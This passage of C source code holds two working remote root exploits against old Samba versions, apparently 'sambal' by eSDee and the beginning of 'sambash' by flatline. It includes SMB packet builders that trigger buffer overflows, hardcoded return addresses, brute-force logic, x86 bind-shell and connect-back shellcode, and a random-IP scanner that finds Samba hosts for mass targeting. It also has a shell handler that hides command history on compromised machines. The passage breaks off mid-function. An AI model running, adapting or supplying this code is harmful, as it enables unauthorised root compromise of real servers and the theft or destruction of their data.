if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

    return -1;

  }

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&connect_read);

FD_ZERO(&connect_write);

FD_SET(fd, &connect_read);

FD_SET(fd, &connect_write);

if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {

if(errno != EINPROGRESS) {

      close(fd);

      return -1;

    }

  }

else {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

      return -1;

    }

return 1;

}

select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

if(select_status == 0) {

close(fd);

return -1;

}

if(select_status == -1) {

close(fd);

return -1;

}

if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {

if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {

getsockopt_length = sizeof(getsockopt_error);

if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {

errno = ETIMEDOUT;

close(fd);

return -1;

}

if(getsockopt_error == 0) {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

       } 

else {

errno = getsockopt_error;

close(fd);

return (-1);

}

}

}

else {

close(fd);

return 1;

}

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

}

int 

read_timer(int fd, unsigned int time_out)

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   fdread;

struct timeval           timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {

close(fd);

return (-1);

}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

return (-1);

}

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&fdread);

FD_SET(fd, &fdread);

select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

if(select_status == 0) {

close(fd);

return (-1);

}

if(select_status == -1) {

close(fd);

return (-1);

}

if(FD_ISSET(fd, &fdread)) {

  if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

      return -1;

    }

return 1;

} 

else {

close(fd);

return 1;

}

}

int

write_timer(int fd, unsigned int time_out)

{

/* ripped from no1 */

int                      flags;

int                      select_status;

fd_set                   fdwrite;

struct timeval           timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {    

close(fd);

return (-1);

}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {

close(fd);

return (-1);

  }

timeout.tv_sec = time_out;

timeout.tv_usec = 0;

FD_ZERO(&fdwrite);

FD_SET(fd, &fdwrite);

select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

if(select_status == 0) {

close(fd);

return -1;

}

if(select_status == -1) {

close(fd);

return -1;

}

if(FD_ISSET(fd, &fdwrite)) {

if(fcntl(fd, F_SETFL, flags) < 0) {

close(fd);

return -1;

}

return 1;

}

else { 

close(fd);

return -1;

}

}

void 

shell(int sock)

{

        fd_set  fd_read;

        char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";

        int n;

        FD_ZERO(&fd_read);

        FD_SET(sock, &fd_read);

        FD_SET(0, &fd_read);

        send(sock, cmd, strlen(cmd), 0);

        while(1) {

                FD_SET(sock,&fd_read);

                FD_SET(0,&fd_read);

                if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

                if (FD_ISSET(sock, &fd_read)) {

                        if((n = recv(sock, buff, sizeof(buff), 0)) < 0){

                                fprintf(stderr, "EOF\n");

                                exit(2);

                        }

                        if (write(1, buff, n) < 0) break;

                }

                if (FD_ISSET(0, &fd_read)) {

                        if((n = read(0, buff, sizeof(buff))) < 0){

                                fprintf(stderr, "EOF\n");

                                exit(2);

                        }

                        if (send(sock, buff, n, 0) < 0) break;

                }

                usleep(10);

        }

        fprintf(stderr, "Connection lost.\n\n");

        exit(0);

}

void

handler()

{

int sock = 0;

int i = 0;

OWNED = 1;

        for (i = 0; i < 100; i++)

                if (childs[i] != 0xffffffff) waitpid(childs[i], NULL, 0);

        if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

                close(sock);

exit(1);

        }

        if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {

                fprintf(stdout, "+ Worked!\n"

                                "--------------------------------------------------------------\n");

                shell(sock);

                close(sock);

        }

}

int 

start_session(int sock)

{

char buffer[1000];

char response[4096];

char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

        char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"

                 "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type = 0x00;         /* session message */

        netbiosheader->flags = 0x00;

        netbiosheader->length = htons(0x2E);

        smbheader->protocol[0] = 0xFF;

        smbheader->protocol[1] = 'S';

        smbheader->protocol[2] = 'M';

        smbheader->protocol[3] = 'B';

        smbheader->command = 0x73;         /* session setup */

        smbheader->flags = 0x08;         /* caseless pathnames */

        smbheader->flags2 = 0x01;         /* long filenames supported */

        smbheader->pid = getpid() & 0xFFFF;

smbheader->uid          = 100;

        smbheader->mid = 0x01;

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);

if(write_timer(sock, 3) == 1)

if (send(sock, buffer, 50, 0) < 0) return -1;

memset(response, 0x00, sizeof(response));

if (read_timer(sock, 3) == 1)

if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;

        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

if (netbiosheader->type != 0x00) fprintf(stderr, "+ Recieved a non session message\n");

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader->type     = 0x00;         /* session message */

        netbiosheader->flags    = 0x00;

        netbiosheader->length   = htons(0x3C);

        smbheader->protocol[0]  = 0xFF;

        smbheader->protocol[1]  = 'S';

        smbheader->protocol[2]  = 'M';

        smbheader->protocol[3]  = 'B';

        smbheader->command      = 0x70;         /* start connection */

smbheader->pid          = getpid() & 0xFFFF;

smbheader->tid = 0x00;

        smbheader->uid          = 100;

memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);

        if(write_timer(sock, 3) == 1)

                if (send(sock, buffer, 64, 0) < 0) return -1;

        memset(response, 0x00, sizeof(response));

        if (read_timer(sock, 3) == 1)

                if (read(sock, response, sizeof(response) - 1) < 0) return -1;

        netbiosheader = (NETBIOS_HEADER *)response;

        smbheader     = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));

        if (netbiosheader->type != 0x00) return -1;

        return 0;

}

int

exploit_normal(int sock, unsigned long ret, char *shellcode)

{

char buffer[4000];

        char exploit_data[] =

                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x90";

int i = 0;

unsigned long dummy = ret - 0x90;

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */

        netbiosheader->flags            = 0x04;

        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;

        smbheader->protocol[1]          = 'S';

        smbheader->protocol[2]          = 'M';

        smbheader->protocol[3]          = 'B';

        smbheader->command              = 0x32;         /* SMBtrans2 */

smbheader->tid = 0x01;

        smbheader->uid                  = 100;

memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

buffer[1096] = 0xEB;

buffer[1097] = 0x70;

for (i = 0; i < 4 * 24; i += 8) {

memcpy(buffer + 1099 + i, &dummy, 4);

memcpy(buffer + 1103 + i, &ret,   4);

}

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), 

exploit_data, sizeof(exploit_data) - 1);

memcpy(buffer + 1800, shellcode, strlen(shellcode));

if(write_timer(sock, 3) == 1) {

if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;

return 0;

}

return -1;

}

int

exploit_openbsd32(int sock, unsigned long ret, char *shellcode)

{

        char buffer[4000];

        char exploit_data[] =

                "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

                "\x00\x00\x00\x90";

        int i = 0;

        unsigned long dummy = ret - 0x30;

        NETBIOS_HEADER  *netbiosheader;

        SMB_HEADER      *smbheader;

        memset(buffer, 0x00, sizeof(buffer));

        netbiosheader   = (NETBIOS_HEADER *)buffer;

        smbheader       = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));

        netbiosheader->type             = 0x00;         /* session message */

        netbiosheader->flags            = 0x04;

        netbiosheader->length           = htons(2096);

        smbheader->protocol[0]          = 0xFF;

        smbheader->protocol[1]          = 'S';

        smbheader->protocol[2]          = 'M';

        smbheader->protocol[3]          = 'B';

        smbheader->command              = 0x32;         /* SMBtrans2 */

        smbheader->tid                  = 0x01;

        smbheader->uid                  = 100;

        memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);

for (i = 0; i < 4 * 24; i += 4)

memcpy(buffer + 1131 + i, &dummy, 4);

        memcpy(buffer + 1127, &ret,      4);

        memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),

                        exploit_data, sizeof(exploit_data) - 1);

        memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));

        if(write_timer(sock, 3) == 1) {

                if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;

                return 0;

        }

        return -1;

}

int

main (int argc,char *argv[])

{

char *shellcode = NULL;

char scan_ip[256];

int brute = -1;

int connectback = 0;

int force = 0;

int i = 0;

int ip1 = 0;

int ip2 = 0;

int ip3 = 0;

int ip4 = 0;

int opt = 0;

int port = 139;

int random = 0;

int scan = 0;

int sock = 0;

int sock2 = 0;

int status = 0;

int type = 0;

int verbose = 0;

unsigned long BRUTE_DELAY = 100000;

unsigned long ret = 0x0;

unsigned long MAX_CHILDS = 40;

unsigned long STEPS = 300;

        struct hostent *he;

fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"

"--------------------------------------------------------------\n");

        while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v")) !=EOF) {

                switch(opt) 

{

case 'b':

brute = atoi(optarg);

if ((brute < 0) || (brute > 3)) {

fprintf(stderr, "Invalid platform.\n\n");

return -1;

}

break;

case 'B':

STEPS = atoi(optarg);

if (STEPS == 0) STEPS++;

break;

case 'c':

sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);

connectback = 1;

if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {

fprintf(stderr, "Invalid IP address.\n\n");

return -1;

}

linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;

linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;

linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;

linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;

break;

case 'C':

MAX_CHILDS = atoi(optarg);

if (MAX_CHILDS == 0) {

fprintf(stderr, "Invalid number of childs.\n");

return -1;

}

if (MAX_CHILDS > 99) {

fprintf(stderr, "Too many childs, using 99. \n");

MAX_CHILDS = 99;

}

break;

case 'd':

BRUTE_DELAY = atoi(optarg);

break;

case 'f':

force = 1;

break;

                        case 'p':

                                port = atoi(optarg);

                                if ((port <= 0) || (port > 65535)) {

                                        fprintf(stderr, "Invalid port.\n\n");

                                        return -1;

                                }

                                break;

case 'r':

ret = strtoul(optarg, &optarg, 16);

break;

case 's':

random = 1;

scan = 1;

break;

case 'S':

random = 0;

scan = 1;

sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);

ip3--;

break;

                        case 't':

                                type = atoi(optarg);

                                if (type == 0 || type > sizeof(targets) / 16) {

                                        for(i = 0; i < sizeof(targets) / 16; i++)

                                                fprintf(stdout, "%02d. %s           [0x%08x]\n", i + 1,

                                                                targets[i].type, (unsigned int) targets[i].ret);

                                        fprintf(stderr, "\n");

                                        return -1;

                                }

                                break;

case 'v':

verbose = 1;

break;

                        default:

                                usage(argv[0] == NULL ? "sambal" : argv[0]);

                                break;

                }

        }

if ((argv[optind] == NULL && scan == 0) || (type == 0 && brute == -1 && scan == 0)) 

usage(argv[0] == NULL ? "sambal" : argv[0]);

if (scan == 1) 

fprintf(stdout, "+ Scan mode.\n");

if (verbose == 1)

fprintf(stdout, "+ Verbose mode.\n");

if (scan == 1) {

srand(getpid());

while (1) {

if (random == 1) {

ip1 = rand() % 255;

ip2 = rand() % 255;

ip3 = rand() % 255; } 

else {

ip3++;

if (ip3 > 254) { ip3 = 1; ip2++; }

if (ip2 > 254) { ip2 = 1; ip1++; }

if (ip1 > 254) exit(0);

}

for (ip4 = 0; ip4 < 255; ip4++) {

i++;

snprintf(scan_ip, sizeof(scan_ip) - 1, "%u.%u.%u.%u", ip1, ip2, ip3, ip4);

usleep(BRUTE_DELAY);

switch (fork()) {

case 0:

switch(is_samba(scan_ip, 2)) {

case 0:

fprintf(stdout, "+ [%s] Samba\n", scan_ip);

break;

case 1:

fprintf(stdout, "+ [%s] Windows\n", scan_ip);

break;

default:

break;

}

exit(0);

break;

case -1:

fprintf(stderr, "+ fork() error\n");

exit(-1);

break;

default:

if (i > MAX_CHILDS - 2) { 

wait(&status); 

i--;

}

break;

}

}

}

return 0;

}

he = gethostbyname(argv[optind]);

        if (he == NULL) {

fprintf(stderr, "Unable to resolve %s...\n", argv[optind]);

return -1;

}

if (brute == -1) {

if (ret == 0) ret = targets[type - 1].ret;

shellcode = targets[type - 1].shellcode;

if (connectback == 1) {

fprintf(stdout, "+ connecting back to: [%d.%d.%d.%d:45295]\n", 

ip1, ip2, ip3, ip4);

switch(targets[type - 1].os_type) {

case 0: /* linux */

shellcode = linux_connect_back;

break;

case 1: /* FreeBSD/NetBSD */

shellcode = bsd_connect_back;

break;

case 2: /* OpenBSD */

shellcode = bsd_connect_back;

break;

case 3: /* OpenBSD 3.2 Non-exec stack */

shellcode = bsd_connect_back;

break;

}

}

if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

fprintf(stderr, "+ socket() error.\n");

return -1;

}

        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

               fprintf(stderr, "+ socket() error.\n");

                return -1;

       }

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

        addr1.sin_family = AF_INET;

        addr1.sin_port = htons(port);

  addr2.sin_family = AF_INET;

        addr2.sin_port   = htons(45295);

if (connect(sock, (struct sockaddr *)&addr1, sizeof(addr1)) == -1) { 

fprintf(stderr, "+ connect() error.\n");

return -1;

}

if (verbose == 1) fprintf(stdout, "+ %s\n", targets[type - 1].type);

if (force == 0) {

if (is_samba(argv[optind], 2) != 0) {

fprintf(stderr, "+ Host is not running samba!\n\n");

return -1;

}

fprintf(stderr, "+ Host is running samba.\n");

}

if (verbose == 1) fprintf(stdout, "+ Connected to [%s:%d]\n", (char *)inet_ntoa(addr1.sin_addr), port);

if (start_session(sock) < 0) fprintf(stderr, "+ Session failed.\n");

if (verbose == 1) fprintf(stdout, "+ Session enstablished\n");

sleep(5);

if (targets[type - 1].os_type != 2) {

if (exploit_normal(sock, ret, shellcode) < 0) {

fprintf(stderr, "+ Failed.\n");

close(sock);

}

} else {

                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {

                                fprintf(stderr, "+ Failed.\n");

                                close(sock);

}

}

sleep(2);

if (connectback == 0) {

        if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) {

                fprintf(stderr, "+ Exploit failed, try -b to bruteforce.\n");

                return -1;

        }

fprintf(stdout, "--------------------------------------------------------------\n");

        shell(sock2);

close(sock);

        close(sock2);

} else {

fprintf(stdout, "+ Done...\n");

close(sock2);

close(sock);

}

return 0;

}

signal(SIGPIPE, SIG_IGN);

signal(SIGUSR1, handler);

switch(brute) {

case 0:

if (ret == 0) ret = 0xc0000000;

shellcode = linux_bindcode;

fprintf(stdout, "+ Bruteforce mode. (Linux)\n");

break;

case 1:

if (ret == 0) ret = 0xbfc00000;

shellcode = bsd_bindcode;

                        fprintf(stdout, "+ Bruteforce mode. (FreeBSD / NetBSD)\n");

break;

case 2:

if (ret == 0) ret = 0xdfc00000;

shellcode = bsd_bindcode;

fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.1 and prior)\n");

break;

case 3:

if (ret == 0) ret = 0x00170000;

shellcode = bsd_bindcode;

fprintf(stdout, "+ Bruteforce mode. (OpenBSD 3.2 - non-exec stack)\n");

break;

}

        memcpy(&addr1.sin_addr, he->h_addr, he->h_length);

memcpy(&addr2.sin_addr, he->h_addr, he->h_length);

addr1.sin_family = AF_INET;

        addr1.sin_port   = htons(port);

        addr2.sin_family = AF_INET;

        addr2.sin_port   = htons(45295);

for (i = 0; i < 100; i++)

childs[i] = -1;

i = 0;

        if (force == 0) {

                if (is_samba(argv[optind], 2) != 0) {

                        fprintf(stderr, "+ Host is not running samba!\n\n");

                return -1;

                }

        fprintf(stderr, "+ Host is running samba.\n");

        }

while (OWNED == 0) {

if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

                if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

if (verbose == 1) fprintf(stderr, "+ socket() error.\n");

}

else {

ret -= STEPS;

i++;

}

                if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0)

if (verbose == 1) fprintf(stderr, "+ socket() error.\n");

if ((ret & 0xff) == 0x00 && brute != 3) ret++;

if (verbose == 1) fprintf(stdout, "+ Using ret: [0x%08x]\n", (unsigned int)ret);

usleep(BRUTE_DELAY);

switch (childs[i] = fork()) {

                case 0:

if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), port, 2) == -1) {

if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

}

       if(write_timer(sock, 3) == 1) {

if (start_session(sock) < 0) {

if (verbose == 1) fprintf(stderr, "+ Session failed.\n");

if (sock  > 2)close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

}

if (brute == 3) {

                        if (exploit_openbsd32(sock, ret, shellcode) < 0) {

                      if (verbose == 1) fprintf(stderr, "+ Failed.\n");

                                    if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

                                }

} 

else {

    if (exploit_normal(sock, ret, shellcode) < 0) {

                  if (verbose == 1) fprintf(stderr, "+ Failed.\n");

              if (sock  > 2) close(sock);

if (sock2 > 2) close(sock2);

exit(-1);

          }

if (sock > 2) close(sock);

        if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) {

if (sock2 > 2) close(sock2);

exit(-1);

}

                               if(Connect(sock2, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {

                                                if (sock2  > 2) close(sock2);

kill(getppid(), SIGUSR1);

}

exit(1);

}

exit(0);

break;

case -1:

                        fprintf(stderr, "+ fork() error\n");

                              exit(-1);

                          break;

                        default:

                        if (i > MAX_CHILDS - 2) {

                                wait(&status);

                                i--;

                                }

                                break;

}

}

}

return 0;

}

/* EOF */

/**

 **   sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root exploit by flatline@blackhat.nl

 **

 **   since we fully control a memcpy(), our options are endless here. i've chosen to go the stack route tho,

 **   because any heap method would've required too much brute forcing or would've required the ugly use of targets.

 **

 **   the stack method still requires little brute forcing and obviously will not survive PaX, but it's efficient.

 **   i'm using executable rets as a 'jmp sled' which jmp to the shellcode to help improve our brute forcing chances a bit.

 **

 **   shouts to (#)0dd, #!l33tsecurity and #!xpc.

 **

 **   many thanks to tcpdump which had to suffer the torture i put it through and often didn't survive (more to come?).

 **

 **   public/private, i don't give a shit.

 **

 **/

#include <sys/socket.h>

#include <netinet/in.h>

#include <arpa/inet.h>

#include <netdb.h>

#include <errno.h>

#include <string.h>

#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <ctype.h>

#include <signal.h>

typedef unsigned char uint8;

typedef unsigned short uint16;

typedef unsigned long uint32;

/* http://ubiqx.org/cifs/SMB.html, CIFS-TR-1p00_FINAL.pdf, smb_cifs_protocol.pdf, 

http://www.ubiqx.org/cifs/rfc-draft/rfc1001.html#s14, http://www.ubiqx.org/cifs/rfc-draft/rfc1002.html#s4.3.2 */

// XXX: lelijkheid: vermijd word padding door hier byte arrays van te maken.

struct variable_data_header

{ uint8 wordcount, bytecount[2];

};

struct nbt_session_header

{ uint8 type, flags, len[2];

};

struct smb_base_header

{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];

  uint8 flags;

  uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];

};

struct negprot_reply_header

{ uint8 wordcount;

  uint8 dialectindex[2];

  uint8 securitymode;

  uint16 maxmpxcount, maxvccount;

  uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;

  uint16 timezone;

  uint8 keylen;

  uint16 bytecount;

};

// omdat we ipasswdlen en passwdlen meegeven is wordcount altijd 13 voor deze header.

struct sesssetupx_request_header

{ uint8 wordcount, command, reserved;

  uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];

  uint8 sessionid[4];

  uint8 ipasswdlen[2], passwdlen[2];

  uint8 reserved2[4], capabilities[4];

};

struct sesssetupx_reply_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];

  // wat volgt: char nativeos[], nativelanman[], primarydomain[];

};

struct tconx_request_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];

  // uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];

};

struct tconx_reply_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];

  // wat volgt: char service[], char nativefilesystem[];

};

// verschilt van trans en trans2 door de 32 bits wijde header fields.

struct nttrans_primary_request_header

{ uint8 wordcount, maxsetupcount, flags[2], totalparamcount[4], totaldatacount[4], maxparamcount[4], maxdatacount[4];

  uint8 paramcount[4], paramoffset[4], datacount[4], dataoffset[4], setupcount, function[2], bytecount[2];

};

struct nttrans_secondary_request_header

{ uint8 pad[4], totalparamcount[4], totaldatacount[4], paramcount[4], paramoffset[4], paramdisplace[4],

    datacount[4], dataoffset[4], datadisplace[4];

};

/* struct trans2_request_header

{ uint8 wordcount;

  int totalparamcount, totaldatacount, maxparamcount, maxdatacount;

  uint8 maxsetupcount[2], flags[2];

  uint8 timeout[4];

  int reserved2, paramcount, paramoffset, datacount, dataoffset, fid;

  uint8 setupcount[2], bytecount[2];

}; */

struct trans2_reply_header

{ uint8 wordcount;

  uint16 totalparamcount, totaldatacount, reserved, paramcount, paramoffset, 

    paramdisplacement, datacount, dataoffset, datadisplacement;

  uint8 setupcount, reserved2;

  uint16 bytecount;

};

#define SMBD_PORT 139

#define SHELLCODE_PORT 5074

#define SMB_NEGPROT 0x72

#define SMB_SESSSETUPX 0x73

#define SMB_TCONX 0x75

#define SMB_TRANS2 0x32

#define SMB_NTTRANS1 0xA0

#define SMB_NTTRANS2 0xA1

#define SMB_NTTRANSCREATE 0x01

#define SMB_TRANS2OPEN 0x00

#define SMB_SESSIONREQ 0x81

#define SMB_SESSION 0x00

#define STACKBOTTOM 0xbfffffff

#define STACKBASE 0xbfffd000

#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))

#define BRUTESTEP 5120

extern char *optarg;

extern int optind, errno, h_errno;

uint16 tid, pid, uid;

uint32 sessionid, PARAMBASE = 0x81c0000;

char *tconx_servername;

int userbreak = 0;

char shellcode[] = "\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52" \

  "\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd" \

  "\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43" \

  "\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52" \

  "\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b"

  "\xcd\x80";

// ach, 't kan ermee door.

char *netbios_encode_name(char *name, int type)

{ char plainname[16], c, *encoded, *ptr;

  int i, len = strlen(name);

  if ((encoded = malloc(34)) == NULL)

  { fprintf(stderr, "malloc() failed\n");

    exit(-1);

  }

  ptr = encoded;

  strncpy(plainname, name, 15);

  *ptr++ = 0x20;

  for (i = 0; i < 16; i++)

  { if (i == 15) c = type;

    else 

    { if (i < len) c = toupper(plainname[i]);

      else c = 0x20;

    }

    *ptr++ = (((c >> 4) & 0xf) + 0x41);

    *ptr++ = ((c & 0xf) + 0x41);

  }

  *ptr = '\0';

  return encoded;

}

void construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)

{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;

  uint16 nlen;

// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..

  if (len > 65535) nlen = 65535;

  else nlen = htons(len);

  memset((void *)nbt_hdr, '\0', sizeof (struct nbt_session_header));

  nbt_hdr->type = type;

  nbt_hdr->flags = flags;

  memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));

}

// caller zorgt voor juiste waarde van ptr.

void construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, 

  uint16 uid, uint16 mid)

{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;

  memset(base_hdr, '\0', sizeof (struct smb_base_header));

  memcpy(base_hdr->protocol, "\xffSMB", 4);

  base_hdr->command = command;

  base_hdr->flags = flags;

  memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));

  memcpy(&base_hdr->tid, &tid, sizeof (uint16));

  memcpy(&base_hdr->pid, &pid, sizeof (uint16));

  memcpy(&base_hdr->uid, &uid, sizeof (uint16));

  memcpy(base_hdr->mid, &mid, sizeof (uint16));

}

void construct_sesssetupx_header(char *ptr)

{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;

  uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;

  uint32 capabilities = 0x50;

  memset(sx_hdr, '\0', sizeof (struct sesssetupx_request_header));

  sx_hdr->wordcount = 13;

  sx_hdr->command = 0xff;

  memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));

  memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));

  memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));

  memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));

  memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));

  memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));

  memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));

}

/*

struct tconx_request_header

{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];

  -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];

}; */

void construct_tconx_header(char *ptr)

{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;

  uint16 passwdlen = 1, bytecount;

  char *data;

  memset(tx_hdr, '\0', sizeof (struct tconx_request_header));

  bytecount = strlen(tconx_servername) + 15;  

  if ((data = malloc(bytecount)) == NULL)

  { fprintf(stderr, "malloc() failed, aborting!\n");

    exit(-1);

  }

  memcpy(data, "\x00\x5c\x5c", 3);

  memcpy(data + 3, tconx_servername, strlen(tconx_servername));

  memcpy(data + 3 + strlen(tconx_servername), "\x5cIPC\x24\x00\x3f\x3f\x3f\x3f\x3f\x00", 12);

  tx_hdr->wordcount = 4;

  tx_hdr->xcommand = 0xff;

  memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));

  memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));

// zorg ervoor dat er genoeg ruimte in het packet is om dit erachter te kunnen plakken.

  memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);

}

// session request versturen.

void nbt_session_request(int fd, char *clientname, char *servername)

{ char *cn, *sn;

